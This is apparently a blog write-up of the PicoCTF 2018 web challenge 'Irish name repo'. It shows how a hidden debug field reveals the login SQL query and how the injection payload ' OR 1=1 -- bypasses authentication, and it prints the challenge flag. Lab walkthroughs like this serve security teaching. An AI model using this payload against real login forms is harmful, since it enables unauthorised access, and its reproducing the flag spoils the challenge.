Contact CTF writeups Notes

[PicoCTF 2018] - web - Irish name repo

This is one of my writeups for PicoCTF 2018

Problem

There is a website running at http://2018shell3.picoctf.com:11899. Do you think you can log us in? Try to see if you can login!

Hints :

  1. There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?

Solution

The hint here seems to point at an SQL injection, but let's browse around the app. We have access to three views :

  1. The index, that has nothing interesting
  2. A "support" page
  3. An "admin login page"

The support page contains another clue pointing at an SQL injection :

Hi. I tried adding my favorite Irish person, Conan O'Brien. But I keep getting something called a SQL Error

With that in mind, we can look at the login page. Inspecting the source, we see there's a hidden debug field :

<form action="login.php" method="POST">
    <fieldset>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" class="form-control">
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <div class="controls">
                <input type="password" id="password" name="password" class="form-control">
            </div>
        </div>
        <input type="hidden" name="debug" value="0">

        <div class="form-actions">
            <input type="submit" value="Login" class="btn btn-primary">
        </div>
    </fieldset>
</form>

To confirm that, I sent a request with a random username and no password (Note: I used Burp suite's proxy and repeater to manipulate the requests). With debug=0, we get :

<h1>Login failed.</h1>

and with debug=1 :

<pre>username: iodbh
password: 
SQL query: SELECT * FROM users WHERE name='aaa' AND password=''
</pre><h1>Login failed.</h1>

Great, no we know how to construct the SQL query.We can to return all rows with a username or ' OR 1=1 -- and an empty password, which will end up constructing the following request :

SELECT * FROM users WHERE name='' OR 1=1 --' AND password=''

Since anything after -- is ignored, the effective query is :

SELECT * FROM users WHERE name='' OR 1=1

If we try this payload, we get the flag in the response : picoCTF{con4n_r3411y_1snt_1r1sh_9cbc118f}